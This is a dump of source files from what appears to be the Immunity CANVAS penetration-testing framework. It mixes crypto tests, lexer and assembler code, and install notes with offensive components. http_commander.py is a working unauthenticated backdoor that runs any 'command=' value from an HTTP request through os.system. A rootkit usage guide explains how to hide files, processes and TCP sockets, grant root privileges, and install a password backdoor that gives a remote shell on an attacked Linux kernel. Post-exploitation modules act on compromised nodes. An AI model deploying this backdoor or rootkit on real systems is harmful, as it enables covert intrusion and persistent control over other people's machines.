/usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2008 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | import sys 9 | if '.' not in sys.path: 10 | sys.path.append('.') 11 | 12 | 13 | from exploitutils import * 14 | from canvasexploit import canvasexploit 15 | 16 | NAME = "exitthread" 17 | DESCRIPTION = "Exit the current thread" 18 | VERSION = "1.0" 19 | 20 | DOCUMENTATION = {} 21 | 22 | PROPERTY = {} 23 | PROPERTY['TYPE'] = "Commands" 24 | PROPERTY['SITE'] = "Local" 25 | PROPERTY['ARCH'] = [ ["Windows"] ] 26 | 27 | class theexploit(canvasexploit): 28 | def __init__(self): 29 | canvasexploit.__init__(self) 30 | self.result = "" 31 | self.exitcode = 0 32 | return 33 | 34 | def getargs(self): 35 | self.exitcode = self.argsDict.get("exitcode", self.exitcode) 36 | return 37 | 38 | def run(self): 39 | self.setInfo("%s (in progress)" % (NAME)) 40 | self.getargs() 41 | 42 | for node in self.argsDict["passednodes"]: 43 | if hasattr(node.shell, 'ExitThread'): 44 | self.result = node.shell.ExitThread(self.exitcode) 45 | 46 | self.setInfo("%s - (finished)" % (NAME)) 47 | return 1 48 | 49 | 50 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/Crypto/test/test_hmac.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # 3 | # Test script for Crypto.Hash.HMAC 4 | # 5 | 6 | __revision__ = "$Id: test_hmac.py,v 1.2 2006/07/29 02:52:51 phil Exp $" 7 | 8 | from sancho.unittest import TestScenario, parse_args, run_scenarios 9 | from Crypto.Hash import HMAC, MD5, SHA 10 | 11 | tested_modules = [ "Crypto.Hash.HMAC" ] 12 | 13 | class HMACTest (TestScenario): 14 | 15 | def setup (self): 16 | pass 17 | 18 | def shutdown (self): 19 | pass 20 | 21 | def check_original (self): 22 | "Check original, pre-1.9 HMAC interface" 23 | self.test_stmt('HMAC.HMAC(MD5)') 24 | h = HMAC.HMAC(MD5) 25 | key1 = "\x0b" * 16 ; data1 = 'Hi There' 26 | digest1 = ('\x92\x94\x72\x7a\x36\x38\xbb\x1c' 27 | '\x13\xf4\x8e\xf8\x15\x8b\xfc\x9d') 28 | key2 = 'Jefe' ; data2 = "what do ya want for nothing?" 29 | digest2 = ('\x75\x0c\x78\x3e\x6a\xb0\xb5\x03' 30 | '\xea\xa8\x6e\x31\x0a\x5d\xb7\x38') 31 | 32 | key3 = '\xAA' * 16 ; data3 = '\xDD' * 50 33 | digest3 = ('\x56\xbe\x34\x52\x1d\x14\x4c\x88' 34 | '\xdb\xb8\xc7\x33\xf0\xe8\xb3\xf6') 35 | 36 | self.test_val('h.hash(key1, [data1])', [digest1]) 37 | self.test_val('h.hash(key2, [data2])', [digest2]) 38 | self.test_val('h.hash(key3, [data3])', [digest3]) 39 | 40 | h = HMAC.HMAC(SHA) 41 | 42 | 43 | if __name__ == "__main__": 44 | (scenarios, options) = parse_args() 45 | run_scenarios(scenarios, options) 46 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/pymsrpc/LICENSE.txt: -------------------------------------------------------------------------------- 1 | Copyright (c) 2007, Cody Pierce 2 | 3 | All rights reserved. 4 | 5 | Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 6 | 7 | * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 8 | * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 9 | * The names of contributors may not be used to endorse or promote products derived from this software without specific prior written permission. 10 | 11 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 12 | "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT 13 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR 14 | A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 15 | CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 16 | EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 17 | PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR 18 | PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF 19 | LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING 20 | NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 21 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -------------------------------------------------------------------------------- /CANVAS_HTSRL/MOSDEF/riscscan.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | """ 4 | riscscan.py 5 | 6 | RISC lex parent class for MOSDEF 7 | 8 | """ 9 | 10 | from mosdefutils import * 11 | from asmscan import asmlex 12 | 13 | class risclex(asmlex): 14 | 15 | opcodes = [] 16 | registers = [] 17 | labels = {} 18 | 19 | def __init__(self, procname=None): 20 | if procname: 21 | mod = __import__('%sassembler' % procname) 22 | self.opcodes = getattr(mod, 'opcodes').keys() 23 | if hasattr(mod, 'registers'): 24 | self.registers = getattr(mod, 'registers') 25 | asmlex.__init__(self) 26 | 27 | 28 | def testlexer(procname,procfile=None): 29 | import os 30 | if not procfile: 31 | procfile = '%s.s' % procname 32 | if not os.path.isfile(procfile): 33 | print "[%s] can not run test (%s not existant)" % (procname, procfile) 34 | return False 35 | from asmscan import getlexer 36 | print "[%s] starting test..." % procname 37 | newlex = getlexer(procname) 38 | data=file(procfile).read() 39 | newlex.input(data) 40 | while 1: 41 | token=newlex.token() 42 | print "[%s] Token=%s" % (procname, token) 43 | if not token: break 44 | print "[%s] successfully tested." % procname 45 | return True 46 | 47 | 48 | if __name__ == "__main__": 49 | proclist = ["sparc", "ppc"] 50 | for proc in proclist: 51 | if not testlexer(proc): 52 | print "[%s] failed." % proc 53 | print "all test done." 54 | 55 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/tlslite/utils/Cryptlib_AES.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | """Cryptlib AES implementation.""" 3 | 4 | from cryptomath import * 5 | from AES import * 6 | 7 | if cryptlibpyLoaded: 8 | 9 | def new(key, mode, IV): 10 | return Cryptlib_AES(key, mode, IV) 11 | 12 | class Cryptlib_AES(AES): 13 | 14 | def __init__(self, key, mode, IV): 15 | AES.__init__(self, key, mode, IV, "cryptlib") 16 | self.context = cryptlib_py.cryptCreateContext(cryptlib_py.CRYPT_UNUSED, cryptlib_py.CRYPT_ALGO_AES) 17 | cryptlib_py.cryptSetAttribute(self.context, cryptlib_py.CRYPT_CTXINFO_MODE, cryptlib_py.CRYPT_MODE_CBC) 18 | cryptlib_py.cryptSetAttribute(self.context, cryptlib_py.CRYPT_CTXINFO_KEYSIZE, len(key)) 19 | cryptlib_py.cryptSetAttributeString(self.context, cryptlib_py.CRYPT_CTXINFO_KEY, key) 20 | cryptlib_py.cryptSetAttributeString(self.context, cryptlib_py.CRYPT_CTXINFO_IV, IV) 21 | 22 | def __del__(self): 23 | cryptlib_py.cryptDestroyContext(self.context) 24 | 25 | def encrypt(self, plaintext): 26 | AES.encrypt(self, plaintext) 27 | bytes = stringToBytes(plaintext) 28 | cryptlib_py.cryptEncrypt(self.context, bytes) 29 | return bytesToString(bytes) 30 | 31 | def decrypt(self, ciphertext): 32 | AES.decrypt(self, ciphertext) 33 | bytes = stringToBytes(ciphertext) 34 | cryptlib_py.cryptDecrypt(self.context, bytes) 35 | return bytesToString(bytes) 36 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/Crypto/PublicKey/test/rsa_speed.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | # Script to time fast and slow RSA operations 4 | # Contributed by Joris Bontje. 5 | 6 | import time, pprint 7 | from Crypto.PublicKey import * 8 | from Crypto.Util.randpool import RandomPool 9 | from Crypto.Util import number 10 | 11 | pool = RandomPool() 12 | pool.stir() 13 | 14 | KEYSIZE=2048 15 | COUNT=5 16 | fasttime=0 17 | slowtime=0 18 | for x in range(COUNT): 19 | begintime=time.time() 20 | rsa=RSA.generate(KEYSIZE, pool.get_bytes) 21 | endtime=time.time() 22 | print "Server: Generating %d bit RSA key: %f s" % (KEYSIZE, endtime-begintime) 23 | rsa_slow=RSA.construct((rsa.n,rsa.e,rsa.d)) 24 | 25 | code=number.getRandomNumber(256, pool.get_bytes) 26 | begintime=time.time() 27 | signature=rsa.sign(code,None)[0] 28 | endtime=time.time() 29 | fast=(endtime-begintime) 30 | fasttime=fasttime+fast 31 | print "Fast signing took %f s" % fast 32 | 33 | begintime=time.time() 34 | signature_slow=rsa_slow.sign(code,None)[0] 35 | endtime=time.time() 36 | slow=(endtime-begintime) 37 | slowtime=slowtime+slow 38 | print "Slow signing took %f s" % slow 39 | 40 | if rsa.verify(code,(signature,)) and signature==signature_slow: 41 | print "Signature okay" 42 | else: 43 | print "Signature WRONG" 44 | 45 | print "faster: %f" % (slow/fast) 46 | 47 | print "Based on %d signatures with %d bits keys the optimized\n RSA decryption/signing algorithm is %f times faster" % (COUNT, KEYSIZE, (slowtime/fasttime)) 48 | 49 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/dnslookup.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2006 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | from threading import Thread 9 | import socket 10 | from internal import * 11 | from engine import CanvasConfig 12 | 13 | class dnslookup(Thread): 14 | def __init__(self,newhost): 15 | Thread.__init__(self) 16 | 17 | self.newhost=newhost 18 | self.setDaemon(1) 19 | 20 | def run(self): 21 | if not CanvasConfig['dnsresolve']: 22 | return 23 | 24 | newhost=self.newhost 25 | ip=newhost.interface 26 | 27 | try: 28 | name,somelist,ipaddrlist=socket.gethostbyaddr(ip) 29 | devlog("dns","Found name %s for ip %s"%(name,ip)) 30 | except socket.herror: 31 | devlog("dns","timed out on name lookup for %s"%ip) 32 | name="" 33 | except socket.gaierror, errmsg_tuple: 34 | devlog("dns","gethostbyaddr: %s" % errmsg_tuple[1]) 35 | name="" 36 | if name: 37 | newhost.add_knowledge("DNSName",name,100) 38 | return 39 | 40 | if __name__=="__main__": 41 | 42 | class fakehost: 43 | def __init__(self): 44 | self.interface="1.2.3.4" 45 | 46 | print "Testing dnslookup" 47 | 48 | lookup=dnslookup(fakehost()) 49 | lookup.start() 50 | 51 | 52 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/shellcode/ppcShellcodeGenerator.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2006 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | """ 9 | PPC shellcode generator 10 | """ 11 | 12 | 13 | import random 14 | from exploitutils import * 15 | from MOSDEF import mosdef 16 | from mosdef_shellcodeGenerator import shellcodeGenerator 17 | 18 | class ppc(shellcodeGenerator): 19 | def __init__(self): 20 | shellcodeGenerator.__init__(self) 21 | self.findeipcode="" 22 | self.arch="PPC" 23 | self.normalizedstack=0 24 | self.foundeip=0 25 | self.handlers["findeip"]=self.findeip 26 | self.reset() 27 | 28 | def reset(self): 29 | shellcodeGenerator.reset(self) 30 | self.code="" 31 | 32 | def finalize(self): 33 | #print "Self.code=%s"%self.code 34 | bin=mosdef.assemble(self.code,self.arch) 35 | self.value=bin 36 | return bin 37 | 38 | def findeip(self,args): 39 | #print "Findeip called" 40 | if self.foundeip: 41 | return 42 | 43 | # Get ip 44 | code=""" 45 | RESERVED_getpc: 46 | xor. r6,r6,r6 47 | bnel RESERVED_getpc 48 | mflr r31 49 | """ 50 | 51 | self.code+=code 52 | #print "findeip code=%s"%self.code 53 | self.foundeip=1 54 | 55 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/Plex/Errors.py: -------------------------------------------------------------------------------- 1 | #======================================================================= 2 | # 3 | # Python Lexical Analyser 4 | # 5 | # Exception classes 6 | # 7 | #======================================================================= 8 | 9 | import exceptions 10 | 11 | class PlexError(exceptions.Exception): 12 | message = "" 13 | 14 | class PlexTypeError(PlexError, TypeError): 15 | pass 16 | 17 | class PlexValueError(PlexError, ValueError): 18 | pass 19 | 20 | class InvalidRegex(PlexError): 21 | pass 22 | 23 | class InvalidToken(PlexError): 24 | 25 | def __init__(self, token_number, message): 26 | PlexError.__init__(self, "Token number %d: %s" % (token_number, message)) 27 | 28 | class InvalidScanner(PlexError): 29 | pass 30 | 31 | class AmbiguousAction(PlexError): 32 | message = "Two tokens with different actions can match the same string" 33 | 34 | def __init__(self): 35 | pass 36 | 37 | class UnrecognizedInput(PlexError): 38 | scanner = None 39 | position = None 40 | state_name = None 41 | 42 | def __init__(self, scanner, state_name, token="Unknown"): 43 | self.scanner = scanner 44 | self.position = scanner.position() 45 | self.state_name = state_name 46 | self.token=token 47 | 48 | def __str__(self): 49 | filename = self.position[0] 50 | line = self.position[1] 51 | character = self.position[2] 52 | ret="'%s', line %d, char %d: Token (%s) not recognised in state %s"% (filename,line, character, repr(self.token), repr(self.state_name)) 53 | print ret 54 | return ret 55 | 56 | 57 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/internal/path.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | import os, sys 4 | import debug 5 | from uniqlist import uniqlist 6 | 7 | def pathstr(path): 8 | if len(path): 9 | if path[-1] != os.path.sep: 10 | path += os.path.sep 11 | return path 12 | 13 | def pathjoin(dirname, filename): 14 | return dirname + os.path.sep + filename 15 | 16 | class pathlist(uniqlist): 17 | def __iadd__(self, tlist): 18 | def _pathstr(pathstr): 19 | if len(pathstr): 20 | if pathstr[-1] != os.path.sep: 21 | pathstr += os.path.sep 22 | return pathstr 23 | return uniqlist.__iadd__(self, map(pathstr, tlist)) 24 | 25 | def get_python_paths(): 26 | python_paths = [] 27 | # FIXME: unix only -> think about win32 28 | for path in ["", "/usr", "/usr/local", "/opt/local"]: 29 | pathlib = pathjoin(path, "lib") 30 | try: 31 | entries = os.listdir(pathlib) 32 | except OSError: 33 | continue 34 | for entry in entries:#os.listdir(pathlib): 35 | subpathlib = pathjoin(pathlib, entry) 36 | if os.path.isdir(subpathlib) and entry[0:6] == "python": 37 | python_paths += [subpathlib] 38 | return pathlist(python_paths) 39 | 40 | def add_python_paths(): 41 | if os.name != "posix" or sys.platform in ["cygwin", "nt", "win32"]: 42 | return 43 | for path in get_python_paths(): 44 | debug.devlog("adding python path %s" % path) 45 | sys.path.append(pathstr(pathjoin(path, "site-packages"))) 46 | 47 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/tlslite/utils/Cryptlib_TripleDES.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | """Cryptlib 3DES implementation.""" 3 | 4 | from cryptomath import * 5 | 6 | from TripleDES import * 7 | 8 | if cryptlibpyLoaded: 9 | 10 | def new(key, mode, IV): 11 | return Cryptlib_TripleDES(key, mode, IV) 12 | 13 | class Cryptlib_TripleDES(TripleDES): 14 | 15 | def __init__(self, key, mode, IV): 16 | TripleDES.__init__(self, key, mode, IV, "cryptlib") 17 | self.context = cryptlib_py.cryptCreateContext(cryptlib_py.CRYPT_UNUSED, cryptlib_py.CRYPT_ALGO_3DES) 18 | cryptlib_py.cryptSetAttribute(self.context, cryptlib_py.CRYPT_CTXINFO_MODE, cryptlib_py.CRYPT_MODE_CBC) 19 | cryptlib_py.cryptSetAttribute(self.context, cryptlib_py.CRYPT_CTXINFO_KEYSIZE, len(key)) 20 | cryptlib_py.cryptSetAttributeString(self.context, cryptlib_py.CRYPT_CTXINFO_KEY, key) 21 | cryptlib_py.cryptSetAttributeString(self.context, cryptlib_py.CRYPT_CTXINFO_IV, IV) 22 | 23 | def __del__(self): 24 | cryptlib_py.cryptDestroyContext(self.context) 25 | 26 | def encrypt(self, plaintext): 27 | TripleDES.encrypt(self, plaintext) 28 | bytes = stringToBytes(plaintext) 29 | cryptlib_py.cryptEncrypt(self.context, bytes) 30 | return bytesToString(bytes) 31 | 32 | def decrypt(self, ciphertext): 33 | TripleDES.decrypt(self, ciphertext) 34 | bytes = stringToBytes(ciphertext) 35 | cryptlib_py.cryptDecrypt(self.context, bytes) 36 | return bytesToString(bytes) -------------------------------------------------------------------------------- /CANVAS_HTSRL/Resources/ifids.txt: -------------------------------------------------------------------------------- 1 | #UUID documentation string 2 | 906b0ce0-c70b-1067-b317-00dd010662da msdtc 3 | fdb3a030-065f-11d1-bb9b-00a024ea5525 mqsvc.exe 4 | a00c021c-2be2-11d2-b678-0000f87a8f8e msqvc.exe 5 | 45f52c28-7f9f-101a-b52b-08002b2efabe wins.exe 6 | 367abb81-9844-35f1-ad32-98f038001003 SERVICES.EXE 7 | bfa951d1-2f0e-11d3-bfd1-00c04fa3490a inetinfo.exe 8 | 8cfb5d70-31a4-11cf-a7d8-00805f48a135 inetinfo.exe 9 | 4f82f460-0e21-11cf-909e-00805f48a135 inetinfo.exe 10 | 82ad4280-036b-11cf-972c-00aa006887b0 inetinfo.exe 11 | 76d12b80-3467-11d3-91ff-0090272f9ea3 mqsvc.exe 12 | 1088a980-eae5-11d0-8d9b-00a02453c337 mqsvc.exe 13 | 98fe2c90-a542-11d0-a4ef-00a0c9062910 store.exe 14 | a00c021c-2be2-11d2-b678-0000f87a8f8e ntfrs.exe 15 | 50abc2a4-574d-40b3-9d66-ee4fd5fba076 DNS.exe 16 | 906b0ce0-c70b-1067-b317-00dd010662da msdtc.exe 17 | 1ff70682-0a51-30e8-076d-740be8cee98b mstask.exe 18 | 378e52b0-c0a9-11cf-822d-00aa0051e40f mstask.exe 19 | 3f99b900-4d87-101b-99b7-aa0004007f07 sqlservr.exe 20 | 6bffd098-a112-3610-9833-46c3f874532d tcpsvcs.exe 21 | 5b821720-f63b-11d0-aad2-00c04fc324db tcpsvcs.exe 22 | 906b0ce0-c70b-1067-b317-00dd010662da msdtcprx 23 | 811109bf-a4e1-11d1-ab54-00a0c91e9b45 winsi2 24 | 5b5b3580-b0e0-11d1-b92d-0060081e87f0 25 | 2465e9e0-a873-11d0-930b-00a0c90ab17c imap service (Exchange) 26 | 1be617c0-31a5-11cf-a7d8-00805f48a135 pop3 27 | fdb3a030-065f-11d1-bb9b-00a024ea5525 28 | 76d12b80-3467-11d3-91ff-0090272f9ea3 29 | 1088a980-eae5-11d0-8d9b-00a02453c337 30 | 41208ee0-e970-11d1-9b9e-00e02c064c39 31 | 8d9f4e40-a03d-11ce-8f69-08003e30051b pnp 32 | 12345778-1234-abcd-ef00-0123456789ab lsarpc -------------------------------------------------------------------------------- /CANVAS_HTSRL/engine/fWrap.py: -------------------------------------------------------------------------------- 1 | #! /bin/env python 2 | 3 | # generic function wrapper for CANVAS 4 | 5 | class fWrap: 6 | def __init__(self, f, alterFunc = None): 7 | self.alter = alterFunc 8 | self.f = f 9 | 10 | def __call__(self, *args, **kwargs): 11 | # examine and alter args here 12 | if self.alter != None: 13 | args, kwargs = self.alter(args, kwargs) 14 | ret = self.f(*args, **kwargs) 15 | # postlude here if you want it 16 | return ret 17 | 18 | # example usage 19 | 20 | def exampleAlterFunc(a, k): 21 | print "ALTERING: Args, Kwargs: ", a, k 22 | aList = list(a) # unfreeze the tuple to list 23 | sList = [] 24 | for c in a[0]: 25 | if c == 'L': c = 'I' 26 | if c == 'l': c = 'i' 27 | sList.append(c) 28 | aList[0] = "".join(sList) 29 | a = tuple(aList) # freeze the list to tuple 30 | print "ALTERED?: Args, Kwargs: ", a, k 31 | return a, k 32 | 33 | # example 34 | if __name__ == "__main__": 35 | import struct 36 | import __builtin__ 37 | __builtin__.__dict__['CANVASPack'] = fWrap(struct.pack, alterFunc = exampleAlterFunc) 38 | # have alterFunc change 'l' to 'i' and 'L' to 'I' for 39 | # 32 bit consistency accross the board. 40 | s = CANVASPack("L", 4) 45 | for c in s: 46 | print "\\x%.2x"%ord(c), 47 | print '\n' 48 | s = CANVASPack("=L", 4) 49 | for c in s: 50 | print "\\x%.2x"%ord(c), 51 | print '\n' 52 | 53 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/rootkits/linux/docs/USAGE: -------------------------------------------------------------------------------- 1 | THINGS TO KNOW: 2 | 3 | Run from gui and set filehide and passwd 4 | *Rootkit hides files that contain the filehide string. 5 | *Programs that contain this string are given root priviledges when 6 | runned and are hidden. 7 | *Childs of this programs are also root and hidden, no matter what 8 | there name is 9 | *TCP sockets of programs/childs are hidden 10 | *A backdoor is installed along with rootkit, you can use linrootkit 11 | inject to retrieve a MOSDEF shell at any time. You need to remember 12 | the password you set. 13 | *Rootkit is loaded at runtime automatically 14 | 15 | USAGE: 16 | *You need to make the module for the exact kernel you are going to 17 | attack, else the module won't load. 18 | -First figure out what distribution and kernel they are using, then 19 | recreate enviroment in a VM(same kernel). You need gcc and the kernel 20 | headers. Move immrt.c immrt.h and Makefile to the VM and run make. If 21 | everything goes right, you will end up with a immrt.ko file, overwrite 22 | the immrt.ko file in CANVA/linux/rootkit with that one. Everything 23 | should work now. 24 | 25 | CLEANING UP: 26 | 27 | *When you want to clean things up you can do the following. 28 | (replace immrt with your filehide string everywere) 29 | cp /bin/bash /bin/immrtbash 30 | run immrtbash 31 | Delete: 32 | /lib/modules/immrt.ko 33 | /etc/init.d/immrt 34 | /etc/rc0.d/S01immrt 35 | /etc/rc1.d/S01immrt 36 | /etc/rc2.d/S01immrt 37 | /etc/rc3.d/S01immrt 38 | /etc/rc4.d/S01immrt 39 | /etc/rc5.d/S01immrt 40 | /etc/rc6.d/S01immrt 41 | 42 | Use find to find any other file you created and delete those too. 43 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/backdoors/http_commander.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | Httpcommander.py - 4 | Starts a webserver on a port 5 | executes a command given in the arguments of any request 6 | """ 7 | 8 | import socket 9 | import sys 10 | import getopt 11 | import urllib 12 | import os 13 | def usage(): 14 | print "./httpcommander.py -p port" 15 | sys.exit(1) 16 | return 17 | 18 | def server(port): 19 | s=socket.socket() 20 | s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 21 | s.bind(("0.0.0.0",port)) 22 | s.listen(5) 23 | s.settimeout(None) 24 | 25 | while 1: 26 | (fd, addr)=s.accept() 27 | print "Got connection from %s"%str(addr) 28 | try: 29 | data=fd.recv(5000) 30 | command=data.split("command=")[1] 31 | command=command.split(" ")[0] 32 | command=urllib.unquote_plus(command) 33 | print "Executing command %s"%command 34 | if command=="quit": 35 | sys.exit(1) 36 | os.system(command) 37 | fd.sendall("200 OK HTTP/1.0\r\n\r\nDone\r\n") 38 | fd.close() 39 | except: 40 | import traceback 41 | traceback.print_exc(file=sys.stderr) 42 | 43 | 44 | def main(args): 45 | port=80 46 | try: 47 | (opt, args) = getopt.getopt(args,"p:") 48 | except: 49 | usage() 50 | 51 | for o,a in opt: 52 | if o=="-p": 53 | port=int(a) 54 | 55 | print "Running server on port %d"%port 56 | server(port) 57 | 58 | if __name__=="__main__": 59 | main(sys.argv[1:]) -------------------------------------------------------------------------------- /CANVAS_HTSRL/exploits/exitprocess/exitprocess.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2008 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | import sys 9 | if '.' not in sys.path: 10 | sys.path.append('.') 11 | 12 | from exploitutils import * 13 | from canvasexploit import canvasexploit 14 | 15 | NAME = "exitprocess" 16 | DESCRIPTION = "Exit the process" 17 | VERSION = "1.0" 18 | 19 | DOCUMENTATION = {} 20 | 21 | PROPERTY = {} 22 | PROPERTY['TYPE'] = "Commands" 23 | PROPERTY['SITE'] = "Local" 24 | 25 | class theexploit(canvasexploit): 26 | def __init__(self): 27 | canvasexploit.__init__(self) 28 | self.result = "" 29 | self.exitcode = 0 30 | return 31 | 32 | def getargs(self): 33 | self.exitcode = self.argsDict.get("exitcode", self.exitcode) 34 | 35 | def run(self): 36 | self.setInfo("%s (in progress)" % (NAME)) 37 | self.getargs() 38 | 39 | for node in self.argsDict["passednodes"]: 40 | type = node.nodetype 41 | # better way than the supported node array .. 42 | if hasattr(node.shell, 'exit'): 43 | self.result = node.shell.exit(exitcode) 44 | else: 45 | self.log("%s node type not supported" % type) 46 | continue 47 | 48 | self.setInfo("%s - (finished)"%(NAME)) 49 | return 1 50 | 51 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/Crypto/test/test_randpool.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # 3 | # Test script for Crypto.Util.randpool. 4 | # 5 | 6 | __revision__ = "$Id: test_randpool.py,v 1.2 2006/07/29 02:52:51 phil Exp $" 7 | 8 | from sancho.unittest import TestScenario, parse_args, run_scenarios 9 | from Crypto.Hash import SHA 10 | from Crypto.Util import randpool 11 | 12 | tested_modules = [ "Crypto.Util.randpool" ] 13 | 14 | class RandomPoolTest (TestScenario): 15 | 16 | def setup (self): 17 | self.pool = randpool.RandomPool(160, hash=SHA) 18 | 19 | def shutdown (self): 20 | del self.pool 21 | 22 | def check_init (self): 23 | "Check initial state" 24 | self.test_val('self.pool.entropy', self.pool.bits) 25 | 26 | def check_get_bytes (self): 27 | "Check retrieving of bytes from the pool" 28 | start_entropy = self.pool.entropy 29 | self.test_bool('self.pool.entropy > 0') 30 | 31 | # Draw out half of the pool's entropy 32 | size = self.pool.entropy / 8 / 2 33 | self.test_stmt('self.pool.get_bytes(size)') 34 | self.test_val('self.pool.entropy', start_entropy - size*8) 35 | 36 | # Draw out the rest of the pool's entropy 37 | self.test_stmt('self.pool.get_bytes(size)') 38 | self.test_val('self.pool.entropy', 0) 39 | 40 | # Remove yet more data; entropy stays at zero 41 | self.test_stmt('self.pool.get_bytes(size)') 42 | self.test_val('self.pool.entropy', 0) 43 | 44 | # class RandomPoolTest 45 | 46 | 47 | if __name__ == "__main__": 48 | (scenarios, options) = parse_args() 49 | run_scenarios(scenarios, options) 50 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/MOSDEF/il2risc.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | from il2proc import ProcGenerate 4 | 5 | 6 | # common to all RISC 7 | # function can be overwritten later 8 | class RISCGenerate(ProcGenerate): 9 | def __init__(self, pointersize=4): 10 | ProcGenerate.__init__(self, pointersize) 11 | 12 | # in order 13 | self.operand_fmt = ('b', 'h', 'w') 14 | 15 | # for hi() and lo() 16 | self.max_addr_loadable = 2 << (self.pointersize - 1) 17 | 18 | #------------------ 19 | # kind of 'macros' 20 | #------------------ 21 | 22 | def opfmt(self, operand_size, fmt): 23 | # TODO: check operand_size in range 24 | if not '_' in fmt: 25 | return "" 26 | pos = fmt.find('_') 27 | return fmt[0:pos] + self.operand_fmt[int(operand_size) >> 1] + fmt[pos+1:] 28 | 29 | # for hi() and lo(): 'bits' is the size of the instruction 30 | 31 | def hi(self, myint, bits=None): 32 | if not bits: 33 | bits = self.max_addr_loadable 34 | return myint >> bits 35 | 36 | def lo(self, myint, bits=None): 37 | if not bits: 38 | bits = self.max_addr_loadable 39 | return myint & ((1 << bits) - 1) 40 | 41 | def is_loadable(self, myint, bits=None): 42 | if not bits: 43 | bits = self.max_addr_loadable 44 | if abs(myint) <= (1 << (bits - 1)) - 1: 45 | return True 46 | return False 47 | 48 | #-------------- 49 | # commun instr 50 | #-------------- 51 | 52 | def t_jump(self, args): 53 | self.out += "b %s\n" % args[0] 54 | 55 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/Documentation/macosinstall.txt: -------------------------------------------------------------------------------- 1 | # NOTE: 2 | # If you install python before, or install the ports in different order and the GUI 3 | # is not working for you, try uninstalll all the port and install it in the right order 4 | 5 | 6 | [o] Install XcodeTools: 7 | -> Sometimes, the installer is on your HD already: 8 | Applications->Installers->Xcode Tools->XcodeTools.mpkg 9 | -> Or find it on the Tiger DVD 10 | -> Or download it from apple.com website 11 | 12 | 13 | [o] Download and install Darwinports : 14 | 15 | http://www.darwinports.org/getdp/ 16 | The usual: ./configure && make && sudo make install 17 | once they are installed: 18 | (change PATH to /opt/local/bin) 19 | 20 | If you are behind an http_proxy, you would probably need: 21 | $ sudo -s 22 | # export RSYNC_PROXY=192.168.1.1:3128 23 | # export ftp_proxy=192.168.1.1:3128 24 | # export http_proxy=192.168.1.1:3128 25 | # port -d selfupdate 26 | 27 | or just 28 | $ sudo port -d selfupdate 29 | 30 | [o] Install libglade and pygtk 31 | $ sudo port install libglade2 py-gtk2 32 | 33 | [o] Install X11? 34 | If you dont have X11 (Tiger OSX users can find it on the DVD, go to "Optional Installs)) you can download it from the Apple website: 35 | http://www.apple.com/downloads/macosx/apple/x11formacosx.html 36 | Download X11User.dmg and install it 37 | 38 | [o] Run X11 39 | Having X11 doesn't mean your GUI will change at all, it will simply open an xterm where you will be able to run the CANVAS gui. 40 | $ /Applications/Utilities/X11.app/Contents/MacOS/X11 & 41 | 42 | [o] run canvas :D 43 | /opt/local/bin/python ./runcanvas.py 44 | 